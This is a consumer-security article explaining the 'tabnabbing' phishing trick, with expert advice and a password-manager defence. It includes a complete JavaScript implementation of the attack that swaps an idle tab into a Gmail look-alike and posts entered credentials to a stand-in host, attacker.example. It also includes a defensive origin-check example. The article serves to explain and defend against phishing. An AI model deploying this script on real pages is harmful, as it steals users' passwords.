Tabnabbing, A Hacker's Latest Phishing Expedition

How many of us leave a half-dozen or so tabs open in our browser throughout the course of the day? That habit is exactly what a new phishing trick relies on. The technique, called 'tabnabbing', is not malware that infects your machine; it is a trick played by an ordinary web page you already have open. It targets people who log in to email or banking accounts, leave a collection of tabs sitting for a period of time, and then type a password into what they believe is the login page they left behind.

The scenario works like this. Your email is open in one tab and a pile of other pages sits in the rest. After a while, one of those other pages, idle in the background, quietly rewrites itself so that its icon, title and contents look exactly like your email sign-in page. Glancing along the tab strip, you assume your session timed out, click the look-alike and sign in again. In doing so you hand over the keys to your kingdom: your password.

"Tabnabbing" is a vulnerability in tabbed browsers recently identified by Aza Raskin, founder of the music search site Songza and creative lead for the Firefox browser at Mozilla. He explains it as such:

How The Attack Works
1. A user navigates to your normal looking site.
2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of JavaScript that takes place instantly.
4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.
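
The five steps above, as an added example that is not Raskin's code or part of the original article: a script that performs the swap, written in plain JavaScript with the focus-and-idle logic separated out so it can be exercised outside a browser. The idle threshold, the look-alike markup and the host attacker.example are assumptions made for the illustration.

```javascript
// Added example (not Raskin's code or anything from the original article):
// the page swap behind tabnabbing, written so the timing logic can be
// exercised outside a browser.  The idle threshold, the look-alike markup
// and the host attacker.example are assumptions chosen for illustration.

const IDLE_MS = 5000;  // assumed: how long the tab must sit idle in the background

// What the innocent-looking tab turns into.  The markup is a crude placeholder,
// not a copy of any real login page, and attacker.example is a fictitious host.
const LOOKALIKE = {
  title: 'Gmail: Email from Google',
  favicon: 'https://attacker.example/gmail.ico',
  html: '<form action="https://attacker.example/collect" method="post">' +
        '<input name="user"><input name="pass" type="password">' +
        '<button>Sign in</button></form>',
};

// Steps 2 and 3 of the description: track focus and activity, and rewrite the
// page once it has been unfocused and idle for idleMs.  doc is the page's
// document (or a stand-in); timestamps are passed in explicitly so the
// controller is deterministic.
function createTabnabber(doc, lookalike = LOOKALIKE, idleMs = IDLE_MS) {
  let hidden = false;     // the tab has lost focus
  let lastActivity = 0;   // time of the last user interaction
  let swapped = false;

  function setFavicon(href) {
    let link = doc.querySelector('link[rel~="icon"]');
    if (!link) {
      link = doc.createElement('link');
      link.rel = 'icon';
      doc.head.appendChild(link);
    }
    link.href = href;
  }

  function swap() {
    doc.title = lookalike.title;     // the tab strip now reads "Gmail: ..."
    setFavicon(lookalike.favicon);   // ...with the matching icon
    doc.body.innerHTML = lookalike.html;
    swapped = true;
  }

  return {
    onBlur(now) { hidden = true; lastActivity = now; },
    onFocus(now) { hidden = false; lastActivity = now; },
    onActivity(now) { lastActivity = now; },
    // Poll this regularly; returns true once the swap has happened.
    tick(now) {
      if (!swapped && hidden && now - lastActivity >= idleMs) swap();
      return swapped;
    },
  };
}

// Wire the controller to a real browser window when one exists.  The form in
// LOOKALIKE posts to the attacker's server, which (step 5) would store the
// credentials and redirect the victim to the real site.
function installInBrowser(win = globalThis.window) {
  if (!win || !win.document) return null;
  const nab = createTabnabber(win.document);
  const now = () => Date.now();
  win.addEventListener('blur', () => nab.onBlur(now()));
  win.addEventListener('focus', () => nab.onFocus(now()));
  for (const ev of ['mousemove', 'keydown', 'scroll']) {
    win.addEventListener(ev, () => nab.onActivity(now()));
  }
  win.setInterval(() => nab.tick(now()), 500);
  return nab;
}

// Minimal stand-in for document, enough to run the controller under Node.
function fakeDocument() {
  const head = { children: [], appendChild(el) { this.children.push(el); } };
  return {
    title: 'Harmless Recipe Blog',
    head,
    body: { innerHTML: '<h1>Ten ways to cook lentils</h1>' },
    createElement(tag) { return { tagName: tag.toUpperCase() }; },
    querySelector(selector) {
      if (!selector.includes('icon')) return null;
      return head.children.find((el) => el.rel === 'icon') || null;
    },
  };
}

installInBrowser();
```

Nothing here needs elevated privilege or a browser bug: the page is only rewriting itself, which any page may do. Blur and focus events are what the description relies on; a current implementation could equally watch `document.visibilityState`. That is also why browsers cannot simply block the trick without breaking legitimate pages, and why the remedy discussed later in the article is to keep sensitive sites isolated and to let a password manager, not your eyes, decide whether a login page is genuine.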


According to an Inc. report, tabnabbing is so far more a proof of concept than a technique seen in practice. Raskin reports that while he is aware of research being done in this area, "I do not believe anyone has reported it being used in the wild."

That raises the question of whether Raskin has tipped attackers off to a new trick. No, says Dirk Morris, CTO of Untangle, which provides open source security software. "The people doing it are truly innovative, so they would have found this vulnerability on their own." Besides, he notes, Raskin's bringing tabnabbing to the world's attention means that browser makers will now work on fixes for it, although, as he acknowledges, there are no fixes yet.

Paul Ducklin, head of technology, Asia Pacific for the security firm Sophos, suggests the easiest way to avoid tabnabbing of your bank site is to open only the bank site, in a window of its own, with no other tabs. "That way, there is never a hidden tab on which the bad guys can change things in the background," he says.

One defence against credential phishing of any kind, tabnabbing included, is a password manager. Software like RoboForm stores all your login information on your computer, in a file protected by a master password, and once you have unlocked it, one click fills in the saved login for a site. The protection comes from how the match is made: a password manager pairs a saved login with the site's real web address rather than with what the page looks like, so it will not offer your Gmail password to a Gmail look-alike served from somewhere else. It also removes the temptation to reuse passwords. "This means you can use really secure passwords like 'awsdWE$FRERV2314:fgv.' The software generates them randomly and you can be certain you have a different password for every site," Ducklin says. RoboForm costs $30 for unlimited passwords and is free for up to 10.
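To make concrete why that address check matters, here is an added example, not RoboForm's code nor anything from the original article, of the decision a password manager makes before filling a login: saved credentials are keyed to the site's origin (scheme, host and port), and a page whose title says Gmail but whose address does not match gets a warning instead of a password. The vault entries, hosts and passwords are constructed for the illustration.

```javascript
// Added example (not RoboForm's code or from the original article): the
// origin check that lets a password manager ignore a tabnabbed login page.
// Saved logins are keyed by origin (scheme, host and port); a credential is
// offered only when the page asking for it has exactly that origin.  The
// vault entries, hosts and passwords below are constructed for illustration.

const VAULT = [
  { name: 'Gmail', origin: 'https://mail.google.com',
    user: 'alice@example.com', pass: 'awsdWE$FRERV2314:fgv' },
  { name: 'First Example Bank', origin: 'https://bank.example',
    user: 'alice', pass: 'V9u#Lq2p!xRm7eTb' },
];

// Decide what the manager does on a page.  pageUrl is the address-bar value,
// pageTitle the document title.  Returns an action and the reason for it, so
// the decision can be explained to the user.
function decideFill(vault, pageUrl, pageTitle = '') {
  let origin;
  try {
    origin = new URL(pageUrl).origin;   // e.g. "https://mail.google.com"
  } catch {
    return { action: 'refuse', reason: 'page address could not be parsed' };
  }

  // Exact origin match: same scheme, host and port as when the login was
  // saved.  A default port (":443" on https) normalises away, so it still
  // matches; plain http, or a host like mail.google.com.attacker.example,
  // does not.
  const hits = vault.filter((entry) => entry.origin === origin);
  if (hits.length > 0) {
    return { action: 'fill', user: hits[0].user,
             reason: `origin ${origin} matches a saved login` };
  }

  // No match, but the page's title borrows the name of a site we hold a
  // login for.  That is the tabnabbing signature: it looks like Gmail but
  // is served from somewhere else.
  const title = pageTitle.toLowerCase();
  const impersonated = vault.find((entry) => title.includes(entry.name.toLowerCase()));
  if (impersonated) {
    return { action: 'warn',
             reason: `title says "${pageTitle}" but origin ${origin} is not ${impersonated.origin}` };
  }

  return { action: 'none', reason: `no saved login for ${origin}` };
}

// Constructed pages: the real site, the tabnabbed tab from the article's
// scenario, a look-alike subdomain, and a downgrade to plain http.
const DEMO_PAGES = [
  ['https://mail.google.com/mail/u/0/#inbox', 'Gmail - Inbox'],
  ['https://recipes.example/lentils', 'Gmail: Email from Google'],
  ['https://mail.google.com.attacker.example/login', 'Gmail'],
  ['http://mail.google.com/', 'Gmail'],
];

for (const [url, title] of DEMO_PAGES) {
  const r = decideFill(VAULT, url, title);
  console.log(`${r.action.padEnd(6)} ${url}  (${r.reason})`);
}
```

The point to take from this is that the manager never consults the page's appearance. The swapped tab can copy the favicon, the title and the form pixel for pixel, but it cannot change the address it is served from, and that is the only thing the fill decision looks at. The remaining gap is the user who, seeing no fill offered, types the password by hand anyway; the 'warn' action exists so that moment carries an explanation rather than silence.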

So while tabnabbing is a real technique that attackers could exploit, the countermeasures above catch it before it gets far: keep your bank in a window of its own, and let a password manager rather than your eyes decide whether a login page is the real one. Now, that's the kind of preemptive strike that works in our favor: catching the phisher before he catches you!